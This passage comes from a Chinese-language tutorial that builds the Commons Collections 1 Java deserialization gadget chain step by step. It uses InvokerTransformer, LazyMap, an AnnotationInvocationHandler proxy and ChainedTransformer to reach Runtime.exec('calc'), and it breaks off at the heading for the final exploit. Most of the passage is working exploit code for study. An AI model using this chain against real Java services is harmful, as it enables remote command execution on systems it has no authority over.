<span class="line"><span style="color:#ADBAC7">        HashMap</span><span style="color:#F69D50">&#x3C;</span><span style="color:#F47067">Object</span><span style="color:#F69D50">,</span><span style="color:#F47067">Object</span><span style="color:#F69D50">> </span><span style="color:#ADBAC7">hashMap</span><span style="color:#F47067">=</span><span style="color:#F47067"> new</span><span style="color:#DCBDFB"> HashMap</span><span style="color:#ADBAC7">();</span></span>
<span class="line"><span style="color:#ADBAC7">        Map</span><span style="color:#ADBAC7"> decorateMap</span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> LazyMap.</span><span style="color:#DCBDFB">decorate</span><span style="color:#ADBAC7">(hashMap,invokerTransformer);</span></span>
<span class="line"><span style="color:#ADBAC7">        decorateMap.</span><span style="color:#DCBDFB">get</span><span style="color:#ADBAC7">(runtime);</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span>
<span class="line"><span style="color:#ADBAC7">}</span></span></code></pre>
<p><em>还可以尝试反射调用两个效果是一样的</em></p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">public</span><span style="color:#F47067"> class</span><span style="color:#F69D50"> temp</span><span style="color:#ADBAC7"> {</span></span>
<span class="line"><span style="color:#F47067">    public</span><span style="color:#F47067"> static</span><span style="color:#F47067"> void</span><span style="color:#DCBDFB"> main</span><span style="color:#ADBAC7">(</span><span style="color:#F47067">String</span><span style="color:#ADBAC7">[] </span><span style="color:#F69D50">args</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">throws</span><span style="color:#ADBAC7"> IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, IllegalAccessException {</span></span>
<span class="line"><span style="color:#ADBAC7">        Runtime</span><span style="color:#ADBAC7"> runtime</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">Runtime.</span><span style="color:#DCBDFB">getRuntime</span><span style="color:#ADBAC7">();</span></span>
<span class="line"><span style="color:#768390">//        Class cls=runtime.getClass();</span></span>
<span class="line"><span style="color:#768390">//        Method method=cls.getMethod("exec", String.class);</span></span>
<span class="line"><span style="color:#768390">//        method.invoke(runtime,"calc");</span></span>
<span class="line"></span>
<span class="line"><span style="color:#ADBAC7">        InvokerTransformer</span><span style="color:#ADBAC7"> invokerTransformer</span><span style="color:#F47067">=new</span><span style="color:#DCBDFB"> InvokerTransformer</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"exec"</span><span style="color:#ADBAC7">, </span><span style="color:#F47067">new</span><span style="color:#F47067"> Class</span><span style="color:#ADBAC7">[]{String.class}, </span><span style="color:#F47067">new</span><span style="color:#F47067"> String</span><span style="color:#ADBAC7">[]{</span><span style="color:#96D0FF">"calc"</span><span style="color:#ADBAC7">});</span></span>
<span class="line"><span style="color:#768390">//        invokerTransformer.transform(runtime);</span></span>
<span class="line"></span>
<span class="line"><span style="color:#ADBAC7">        HashMap</span><span style="color:#F69D50">&#x3C;</span><span style="color:#F47067">Object</span><span style="color:#F69D50">,</span><span style="color:#F47067">Object</span><span style="color:#F69D50">> </span><span style="color:#ADBAC7">hashMap</span><span style="color:#F47067">=</span><span style="color:#F47067"> new</span><span style="color:#DCBDFB"> HashMap</span><span style="color:#ADBAC7">();</span></span>
<span class="line"><span style="color:#ADBAC7">        Map</span><span style="color:#ADBAC7"> decorateMap</span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> LazyMap.</span><span style="color:#DCBDFB">decorate</span><span style="color:#ADBAC7">(hashMap,invokerTransformer);</span></span>
<span class="line"><span style="color:#768390">//        decorateMap.get(runtime);</span></span>
<span class="line"></span>
<span class="line"><span style="color:#ADBAC7">        Class</span><span style="color:#F69D50">&#x3C;</span><span style="color:#F47067">LazyMap</span><span style="color:#F69D50">> </span><span style="color:#ADBAC7">lazyMapClass</span><span style="color:#F47067"> =</span><span style="color:#ADBAC7"> LazyMap.class;</span></span>
<span class="line"><span style="color:#ADBAC7">        Method</span><span style="color:#ADBAC7"> lazyGetMethod</span><span style="color:#F47067"> =</span><span style="color:#ADBAC7"> lazyMapClass.</span><span style="color:#DCBDFB">getDeclaredMethod</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"get"</span><span style="color:#ADBAC7">, Object.class);</span></span>
<span class="line"><span style="color:#ADBAC7">        lazyGetMethod.</span><span style="color:#DCBDFB">setAccessible</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">true</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#ADBAC7">        lazyGetMethod.</span><span style="color:#DCBDFB">invoke</span><span style="color:#ADBAC7">(decorateMap, runtime);</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span>
<span class="line"><span style="color:#ADBAC7">}</span></span></code></pre>
<p>那么继续往下走，走到调用get方法的地方，看yso的链到了<code>AnnotationInvocationHandler.invoke()</code></p>
<h2 id="annotationinvocationhandlerinvoke">AnnotationInvocationHandler.invoke()</h2>
<p>根据yso的链找到这里，看一眼源码先</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">    public</span><span style="color:#ADBAC7"> Object </span><span style="color:#DCBDFB">invoke</span><span style="color:#ADBAC7">(Object proxy, Method method, </span><span style="color:#F47067">Object</span><span style="color:#ADBAC7">[] args) {</span></span>
<span class="line"><span style="color:#ADBAC7">        String</span><span style="color:#ADBAC7"> member</span><span style="color:#F47067"> =</span><span style="color:#ADBAC7"> method.</span><span style="color:#DCBDFB">getName</span><span style="color:#ADBAC7">();</span></span>
<span class="line"><span style="color:#ADBAC7">        Class</span><span style="color:#F69D50">&#x3C;</span><span style="color:#F47067">?</span><span style="color:#F69D50">>[] </span><span style="color:#ADBAC7">paramTypes</span><span style="color:#F47067"> =</span><span style="color:#ADBAC7"> method.</span><span style="color:#DCBDFB">getParameterTypes</span><span style="color:#ADBAC7">();</span></span>
<span class="line"></span>
<span class="line"><span style="color:#768390">        // Handle Object and Annotation methods</span></span>
<span class="line"><span style="color:#F47067">        if</span><span style="color:#ADBAC7"> (member.</span><span style="color:#DCBDFB">equals</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"equals"</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">&#x26;&#x26;</span><span style="color:#ADBAC7"> paramTypes.length </span><span style="color:#F47067">==</span><span style="color:#6CB6FF"> 1</span><span style="color:#F47067"> &#x26;&#x26;</span></span>
<span class="line"><span style="color:#ADBAC7">            paramTypes[</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">] </span><span style="color:#F47067">==</span><span style="color:#ADBAC7"> Object.class)</span></span>
<span class="line"><span style="color:#F47067">            return</span><span style="color:#DCBDFB"> equalsImpl</span><span style="color:#ADBAC7">(args[</span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">]);</span></span>
<span class="line"><span style="color:#F47067">        if</span><span style="color:#ADBAC7"> (paramTypes.length </span><span style="color:#F47067">!=</span><span style="color:#6CB6FF"> 0</span><span style="color:#ADBAC7">)</span></span>
<span class="line"><span style="color:#F47067">            throw</span><span style="color:#F47067"> new</span><span style="color:#DCBDFB"> AssertionError</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"Too many parameters for an annotation method"</span><span style="color:#ADBAC7">);</span></span>
<span class="line"></span>
<span class="line"><span style="color:#F47067">        switch</span><span style="color:#ADBAC7">(member) {</span></span>
<span class="line"><span style="color:#F47067">        case</span><span style="color:#96D0FF"> "toString"</span><span style="color:#F47067">:</span></span>
<span class="line"><span style="color:#F47067">            return</span><span style="color:#DCBDFB"> toStringImpl</span><span style="color:#ADBAC7">();</span></span>
<span class="line"><span style="color:#F47067">        case</span><span style="color:#96D0FF"> "hashCode"</span><span style="color:#F47067">:</span></span>
<span class="line"><span style="color:#F47067">            return</span><span style="color:#DCBDFB"> hashCodeImpl</span><span style="color:#ADBAC7">();</span></span>
<span class="line"><span style="color:#F47067">        case</span><span style="color:#96D0FF"> "annotationType"</span><span style="color:#F47067">:</span></span>
<span class="line"><span style="color:#F47067">            return</span><span style="color:#ADBAC7"> type;</span></span>
<span class="line"><span style="color:#ADBAC7">        }</span></span>
<span class="line"></span>
<span class="line"><span style="color:#768390">        // Handle annotation member accessors</span></span>
<span class="line"><span style="color:#ADBAC7">        Object</span><span style="color:#ADBAC7"> result</span><span style="color:#F47067"> =</span><span style="color:#ADBAC7"> memberValues.</span><span style="color:#DCBDFB">get</span><span style="color:#ADBAC7">(member);</span></span>
<span class="line"></span>
<span class="line"><span style="color:#F47067">        if</span><span style="color:#ADBAC7"> (result </span><span style="color:#F47067">==</span><span style="color:#6CB6FF"> null</span><span style="color:#ADBAC7">)</span></span>
<span class="line"><span style="color:#F47067">            throw</span><span style="color:#F47067"> new</span><span style="color:#DCBDFB"> IncompleteAnnotationException</span><span style="color:#ADBAC7">(type, member);</span></span>
<span class="line"></span>
<span class="line"><span style="color:#F47067">        if</span><span style="color:#ADBAC7"> (result </span><span style="color:#F47067">instanceof</span><span style="color:#ADBAC7"> ExceptionProxy)</span></span>
<span class="line"><span style="color:#F47067">            throw</span><span style="color:#ADBAC7"> ((ExceptionProxy) result).</span><span style="color:#DCBDFB">generateException</span><span style="color:#ADBAC7">();</span></span>
<span class="line"></span>
<span class="line"><span style="color:#F47067">        if</span><span style="color:#ADBAC7"> (result.</span><span style="color:#DCBDFB">getClass</span><span style="color:#ADBAC7">().</span><span style="color:#DCBDFB">isArray</span><span style="color:#ADBAC7">() </span><span style="color:#F47067">&#x26;&#x26;</span><span style="color:#ADBAC7"> Array.</span><span style="color:#DCBDFB">getLength</span><span style="color:#ADBAC7">(result) </span><span style="color:#F47067">!=</span><span style="color:#6CB6FF"> 0</span><span style="color:#ADBAC7">)</span></span>
<span class="line"><span style="color:#ADBAC7">            result </span><span style="color:#F47067">=</span><span style="color:#DCBDFB"> cloneArray</span><span style="color:#ADBAC7">(result);</span></span>
<span class="line"></span>
<span class="line"><span style="color:#F47067">        return</span><span style="color:#ADBAC7"> result;</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span></code></pre>
<p>需要触发 <code>invoke</code> 方法，马上想到动态代理，一个类被动态代理了之后，想要通过代理调用这个类的方法，就一定会调用 <code>invoke()</code> 方法</p>
<p>那我们尝试写一个代理去调用</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">public</span><span style="color:#F47067"> class</span><span style="color:#F69D50"> temp</span><span style="color:#ADBAC7"> {</span></span>
<span class="line"><span style="color:#F47067">    public</span><span style="color:#F47067"> static</span><span style="color:#F47067"> void</span><span style="color:#DCBDFB"> main</span><span style="color:#ADBAC7">(</span><span style="color:#F47067">String</span><span style="color:#ADBAC7">[] </span><span style="color:#F69D50">args</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">throws</span><span style="color:#ADBAC7"> Exception {</span></span>
<span class="line"><span style="color:#ADBAC7">        Runtime</span><span style="color:#ADBAC7"> runtime</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">Runtime.</span><span style="color:#DCBDFB">getRuntime</span><span style="color:#ADBAC7">();</span></span>
<span class="line"><span style="color:#768390">//        Class cls=runtime.getClass();</span></span>
<span class="line"><span style="color:#768390">//        Method method=cls.getMethod("exec", String.class);</span></span>
<span class="line"><span style="color:#768390">//        method.invoke(runtime,"calc");</span></span>
<span class="line"></span>
<span class="line"><span style="color:#ADBAC7">        InvokerTransformer</span><span style="color:#ADBAC7"> invokerTransformer</span><span style="color:#F47067">=new</span><span style="color:#DCBDFB"> InvokerTransformer</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"exec"</span><span style="color:#ADBAC7">, </span><span style="color:#F47067">new</span><span style="color:#F47067"> Class</span><span style="color:#ADBAC7">[]{String.class}, </span><span style="color:#F47067">new</span><span style="color:#F47067"> String</span><span style="color:#ADBAC7">[]{</span><span style="color:#96D0FF">"calc"</span><span style="color:#ADBAC7">});</span></span>
<span class="line"><span style="color:#768390">//        invokerTransformer.transform(runtime);</span></span>
<span class="line"></span>
<span class="line"><span style="color:#ADBAC7">        HashMap</span><span style="color:#F69D50">&#x3C;</span><span style="color:#F47067">Object</span><span style="color:#F69D50">,</span><span style="color:#F47067">Object</span><span style="color:#F69D50">> </span><span style="color:#ADBAC7">hashMap</span><span style="color:#F47067">=</span><span style="color:#F47067"> new</span><span style="color:#DCBDFB"> HashMap</span><span style="color:#ADBAC7">();</span></span>
<span class="line"><span style="color:#ADBAC7">        Map</span><span style="color:#ADBAC7"> decorateMap</span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> LazyMap.</span><span style="color:#DCBDFB">decorate</span><span style="color:#ADBAC7">(hashMap,invokerTransformer);</span></span>
<span class="line"><span style="color:#768390">//        decorateMap.get(runtime);</span></span>
<span class="line"></span>
<span class="line"></span>
<span class="line"><span style="color:#ADBAC7">        Class</span><span style="color:#ADBAC7"> c</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">Class.</span><span style="color:#DCBDFB">forName</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"sun.reflect.annotation.AnnotationInvocationHandler"</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#ADBAC7">        Constructor</span><span style="color:#ADBAC7"> annotationInvocationConstructor</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">c.</span><span style="color:#DCBDFB">getDeclaredConstructor</span><span style="color:#ADBAC7">(Class.class,Map.class);</span></span>
<span class="line"><span style="color:#ADBAC7">        annotationInvocationConstructor.</span><span style="color:#DCBDFB">setAccessible</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">true</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#ADBAC7">        InvocationHandler</span><span style="color:#ADBAC7"> handler</span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> (InvocationHandler) annotationInvocationConstructor.</span><span style="color:#DCBDFB">newInstance</span><span style="color:#ADBAC7">(Override.class,decorateMap);</span></span>
<span class="line"></span>
<span class="line"><span style="color:#ADBAC7">        Map</span><span style="color:#ADBAC7"> proxyMap</span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> (Map) Proxy.</span><span style="color:#DCBDFB">newProxyInstance</span><span style="color:#ADBAC7">(ClassLoader.</span><span style="color:#DCBDFB">getSystemClassLoader</span><span style="color:#ADBAC7">(), (Class</span><span style="color:#F47067">&#x3C;?></span><span style="color:#ADBAC7">[]) </span><span style="color:#F47067">new</span><span style="color:#F47067"> Class</span><span style="color:#ADBAC7">[]{Map.class},handler);</span></span>
<span class="line"><span style="color:#ADBAC7">        Object</span><span style="color:#ADBAC7"> o</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">annotationInvocationConstructor.</span><span style="color:#DCBDFB">newInstance</span><span style="color:#ADBAC7">(Override.class,proxyMap);</span></span>
<span class="line"></span>
<span class="line"><span style="color:#ADBAC7">        SerializeUtils.</span><span style="color:#DCBDFB">serialize</span><span style="color:#ADBAC7">(o);</span></span>
<span class="line"></span>
<span class="line"><span style="color:#ADBAC7">        SerializeUtils.</span><span style="color:#DCBDFB">unserialize</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"ser.bin"</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span>
<span class="line"><span style="color:#ADBAC7">}</span></span></code></pre>
<p>发现没有弹计算器还报错了，因为runtime根本没调用到，报错<code>The method 'exec' on 'class java.lang.String' does not exist</code></p>
<p>我们这里只能控制一个参数就是<code>memberValues</code></p>
<p>那么我们也就要想办法在一个map里面塞下所有命令执行的参数，那么这里我们就要用到另外两个辅助我们的工具类了</p>
<h2 id="constanttransformerchainedtransformer">ConstantTransformer&#x26;&#x26;ChainedTransformer</h2>
<p>我们回到之前执行命令的地方看</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">public</span><span style="color:#F47067"> class</span><span style="color:#F69D50"> temp</span><span style="color:#ADBAC7"> {</span></span>
<span class="line"><span style="color:#F47067">    public</span><span style="color:#F47067"> static</span><span style="color:#F47067"> void</span><span style="color:#DCBDFB"> main</span><span style="color:#ADBAC7">(</span><span style="color:#F47067">String</span><span style="color:#ADBAC7">[] </span><span style="color:#F69D50">args</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">throws</span><span style="color:#ADBAC7"> Exception {</span></span>
<span class="line"><span style="color:#768390">//        Runtime runtime=Runtime.getRuntime();</span></span>
<span class="line"><span style="color:#768390">//        Class cls=runtime.getClass();</span></span>
<span class="line"><span style="color:#768390">//        Method method=cls.getMethod("exec", String.class);</span></span>
<span class="line"><span style="color:#768390">//        method.invoke(runtime,"calc");</span></span>
<span class="line"><span style="color:#ADBAC7">        Class</span><span style="color:#ADBAC7"> c</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">Runtime.class;</span></span>
<span class="line"><span style="color:#ADBAC7">        Method</span><span style="color:#ADBAC7"> get_runtime</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">c.</span><span style="color:#DCBDFB">getMethod</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"getRuntime"</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#ADBAC7">        Method</span><span style="color:#ADBAC7"> exec</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">c.</span><span style="color:#DCBDFB">getMethod</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"exec"</span><span style="color:#ADBAC7">, String.class);</span></span>
<span class="line"><span style="color:#ADBAC7">        exec.</span><span style="color:#DCBDFB">invoke</span><span style="color:#ADBAC7">(get_runtime.</span><span style="color:#DCBDFB">invoke</span><span style="color:#ADBAC7">(c),</span><span style="color:#96D0FF">"calc"</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#ADBAC7">        }</span></span>
<span class="line"><span style="color:#ADBAC7">}</span></span>
<span class="line"></span></code></pre>
<p>我们把它拆分开来</p>
<ol>
<li>获取Runtime类</li>
<li>获取getRuntime方法</li>
<li>获取exec方法</li>
<li>从下往上invoke嵌套</li>
</ol>
<p>那么，有没有方法可以把他们整合到一起呢，当然是有的，我们把几个获取方法都整合成用<code>InvokerTransformer</code>的类的方法构造出来</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">new</span><span style="color:#DCBDFB"> InvokerTransformer</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"getMethod"</span><span style="color:#ADBAC7">,</span><span style="color:#F47067">new</span><span style="color:#F47067"> Class</span><span style="color:#ADBAC7">[]{String.class,</span><span style="color:#F47067">Class</span><span style="color:#ADBAC7">[].class},</span><span style="color:#F47067">new</span><span style="color:#F47067"> Object</span><span style="color:#ADBAC7">[]{</span><span style="color:#96D0FF">"getRuntime"</span><span style="color:#ADBAC7">,</span><span style="color:#6CB6FF">null</span><span style="color:#ADBAC7">})</span></span>
<span class="line"><span style="color:#ADBAC7">new InvokerTransformer("invoke",</span><span style="color:#F47067">new</span><span style="color:#F47067"> Class</span><span style="color:#ADBAC7">[]{Object.class,</span><span style="color:#F47067">Object</span><span style="color:#ADBAC7">[].class},</span><span style="color:#F47067">new</span><span style="color:#F47067"> Object</span><span style="color:#ADBAC7">[]{</span><span style="color:#6CB6FF">null</span><span style="color:#ADBAC7">,</span><span style="color:#6CB6FF">null</span><span style="color:#ADBAC7">})</span></span>
<span class="line"><span style="color:#F47067">new</span><span style="color:#DCBDFB"> InvokerTransformer</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"exec"</span><span style="color:#ADBAC7">,</span><span style="color:#F47067">new</span><span style="color:#F47067"> Class</span><span style="color:#ADBAC7">[]{String.class},</span><span style="color:#F47067">new</span><span style="color:#F47067"> Object</span><span style="color:#ADBAC7">[]{</span><span style="color:#96D0FF">"calc"</span><span style="color:#ADBAC7">})</span></span></code></pre>
<blockquote>
<p>如果这里看不懂罚你回去从InvokerTransformer链头开始看</p>
</blockquote>
<p>这个时候我们正好有一个方法，对他们依次调用<code>transform</code>方法并且上一个的结果进行调用，那就是<code>ChainedTransformer</code>类，我们看一下对应源码</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">    public</span><span style="color:#DCBDFB"> ChainedTransformer</span><span style="color:#ADBAC7">(</span><span style="color:#F47067">Transformer</span><span style="color:#ADBAC7">[] transformers) {</span></span>
<span class="line"><span style="color:#6CB6FF">        super</span><span style="color:#ADBAC7">();</span></span>
<span class="line"><span style="color:#ADBAC7">        iTransformers </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> transformers;</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span>
<span class="line"></span>
<span class="line"><span style="color:#768390">    /**</span></span>
<span class="line"><span style="color:#768390">     * Transforms the input to result via each decorated transformer</span></span>
<span class="line"><span style="color:#768390">     * </span></span>
<span class="line"><span style="color:#768390">     * </span><span style="color:#F47067">@param</span><span style="color:#F69D50"> object</span><span style="color:#768390">  the input object passed to the first transformer</span></span>
<span class="line"><span style="color:#768390">     * </span><span style="color:#F47067">@return</span><span style="color:#768390"> the transformed result</span></span>
<span class="line"><span style="color:#768390">     */</span></span>
<span class="line"><span style="color:#F47067">    public</span><span style="color:#ADBAC7"> Object </span><span style="color:#DCBDFB">transform</span><span style="color:#ADBAC7">(Object object) {</span></span>
<span class="line"><span style="color:#F47067">        for</span><span style="color:#ADBAC7"> (</span><span style="color:#F47067">int</span><span style="color:#ADBAC7"> i</span><span style="color:#F47067"> =</span><span style="color:#6CB6FF"> 0</span><span style="color:#ADBAC7">; i </span><span style="color:#F47067">&#x3C;</span><span style="color:#ADBAC7"> iTransformers.length; i</span><span style="color:#F47067">++</span><span style="color:#ADBAC7">) {</span></span>
<span class="line"><span style="color:#ADBAC7">            object </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> iTransformers[i].</span><span style="color:#DCBDFB">transform</span><span style="color:#ADBAC7">(object);</span></span>
<span class="line"><span style="color:#ADBAC7">        }</span></span>
<span class="line"><span style="color:#F47067">        return</span><span style="color:#ADBAC7"> object;</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span></code></pre>
<p>接受一个数组，对亚目循环调用<code>transform</code>方法，接受的是一个<code>Transformer[]</code>数组</p>
<p>那么我们现在就可以这样写</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">Transformer</span><span style="color:#F69D50">[] </span><span style="color:#ADBAC7">transformers</span><span style="color:#F47067">=new</span><span style="color:#F47067"> Transformer</span><span style="color:#ADBAC7">[]{</span></span>
<span class="line"><span style="color:#F47067">    new</span><span style="color:#DCBDFB"> InvokerTransformer</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"getMethod"</span><span style="color:#ADBAC7">,</span><span style="color:#F47067">new</span><span style="color:#F47067"> Class</span><span style="color:#ADBAC7">[]{String.class,</span><span style="color:#F47067">Class</span><span style="color:#ADBAC7">[].class},</span><span style="color:#F47067">new</span><span style="color:#F47067"> Object</span><span style="color:#ADBAC7">[]{</span><span style="color:#96D0FF">"getRuntime"</span><span style="color:#ADBAC7">,</span><span style="color:#6CB6FF">null</span><span style="color:#ADBAC7">}),</span></span>
<span class="line"><span style="color:#F47067">    new</span><span style="color:#DCBDFB"> InvokerTransformer</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"invoke"</span><span style="color:#ADBAC7">,</span><span style="color:#F47067">new</span><span style="color:#F47067"> Class</span><span style="color:#ADBAC7">[]{Object.class,</span><span style="color:#F47067">Object</span><span style="color:#ADBAC7">[].class},</span><span style="color:#F47067">new</span><span style="color:#F47067"> Object</span><span style="color:#ADBAC7">[]{</span><span style="color:#6CB6FF">null</span><span style="color:#ADBAC7">,</span><span style="color:#6CB6FF">null</span><span style="color:#ADBAC7">}),</span></span>
<span class="line"><span style="color:#F47067">    new</span><span style="color:#DCBDFB"> InvokerTransformer</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"exec"</span><span style="color:#ADBAC7">,</span><span style="color:#F47067">new</span><span style="color:#F47067"> Class</span><span style="color:#ADBAC7">[]{String.class},</span><span style="color:#F47067">new</span><span style="color:#F47067"> Object</span><span style="color:#ADBAC7">[]{</span><span style="color:#96D0FF">"calc"</span><span style="color:#ADBAC7">})</span></span>
<span class="line"><span style="color:#ADBAC7">};</span></span>
<span class="line"><span style="color:#ADBAC7">ChainedTransformer</span><span style="color:#ADBAC7"> chainedTransformer</span><span style="color:#F47067">=new</span><span style="color:#DCBDFB"> ChainedTransformer</span><span style="color:#ADBAC7">(transformers);</span></span></code></pre>
<p>但是我们还少一个<code>runtime</code>头，我们需要把一个<code>runtime</code>类转换成<code>transform</code>对象，我们就要用到另一个工具类</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">public</span><span style="color:#DCBDFB"> ConstantTransformer</span><span style="color:#ADBAC7">(Object constantToReturn) {</span></span>
<span class="line"><span style="color:#6CB6FF">    super</span><span style="color:#ADBAC7">();</span></span>
<span class="line"><span style="color:#ADBAC7">    iConstant </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> constantToReturn;</span></span>
<span class="line"><span style="color:#ADBAC7">}</span></span>
<span class="line"></span>
<span class="line"><span style="color:#768390">/**</span></span>
<span class="line"><span style="color:#768390">     * Transforms the input by ignoring it and returning the stored constant instead.</span></span>
<span class="line"><span style="color:#768390">     * </span></span>
<span class="line"><span style="color:#768390">     * </span><span style="color:#F47067">@param</span><span style="color:#F69D50"> input</span><span style="color:#768390">  the input object which is ignored</span></span>
<span class="line"><span style="color:#768390">     * </span><span style="color:#F47067">@return</span><span style="color:#768390"> the stored constant</span></span>
<span class="line"><span style="color:#768390">     */</span></span>
<span class="line"><span style="color:#F47067">public</span><span style="color:#ADBAC7"> Object </span><span style="color:#DCBDFB">transform</span><span style="color:#ADBAC7">(Object input) {</span></span>
<span class="line"><span style="color:#F47067">    return</span><span style="color:#ADBAC7"> iConstant;</span></span>
<span class="line"><span style="color:#ADBAC7">}</span></span></code></pre>
<p>只要把我们的runtime传进去就行了，那么我们最后构造好就是这样</p>
<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">Transformer</span><span style="color:#F69D50">[] </span><span style="color:#ADBAC7">transformers</span><span style="color:#F47067">=new</span><span style="color:#F47067"> Transformer</span><span style="color:#ADBAC7">[]{</span></span>
<span class="line"><span style="color:#F47067">    new</span><span style="color:#DCBDFB"> ConstantTransformer</span><span style="color:#ADBAC7">(Runtime.class),</span></span>
<span class="line"><span style="color:#F47067">    new</span><span style="color:#DCBDFB"> InvokerTransformer</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"getMethod"</span><span style="color:#ADBAC7">,</span><span style="color:#F47067">new</span><span style="color:#F47067"> Class</span><span style="color:#ADBAC7">[]{String.class,</span><span style="color:#F47067">Class</span><span style="color:#ADBAC7">[].class},</span><span style="color:#F47067">new</span><span style="color:#F47067"> Object</span><span style="color:#ADBAC7">[]{</span><span style="color:#96D0FF">"getRuntime"</span><span style="color:#ADBAC7">,</span><span style="color:#6CB6FF">null</span><span style="color:#ADBAC7">}),</span></span>
<span class="line"><span style="color:#F47067">    new</span><span style="color:#DCBDFB"> InvokerTransformer</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"invoke"</span><span style="color:#ADBAC7">,</span><span style="color:#F47067">new</span><span style="color:#F47067"> Class</span><span style="color:#ADBAC7">[]{Object.class,</span><span style="color:#F47067">Object</span><span style="color:#ADBAC7">[].class},</span><span style="color:#F47067">new</span><span style="color:#F47067"> Object</span><span style="color:#ADBAC7">[]{</span><span style="color:#6CB6FF">null</span><span style="color:#ADBAC7">,</span><span style="color:#6CB6FF">null</span><span style="color:#ADBAC7">}),</span></span>
<span class="line"><span style="color:#F47067">    new</span><span style="color:#DCBDFB"> InvokerTransformer</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"exec"</span><span style="color:#ADBAC7">,</span><span style="color:#F47067">new</span><span style="color:#F47067"> Class</span><span style="color:#ADBAC7">[]{String.class},</span><span style="color:#F47067">new</span><span style="color:#F47067"> Object</span><span style="color:#ADBAC7">[]{</span><span style="color:#96D0FF">"calc"</span><span style="color:#ADBAC7">})</span></span>
<span class="line"><span style="color:#ADBAC7">};</span></span>
<span class="line"><span style="color:#ADBAC7">ChainedTransformer</span><span style="color:#ADBAC7"> chainedTransformer</span><span style="color:#F47067">=new</span><span style="color:#DCBDFB"> ChainedTransformer</span><span style="color:#ADBAC7">(transformers);</span></span></code></pre>
<p>至此，我们的所有链完全贯通，cc1链大功告成</p>
<h2 id="最终exp">最终exp</h2>
<p>那么最终exp就为</p>
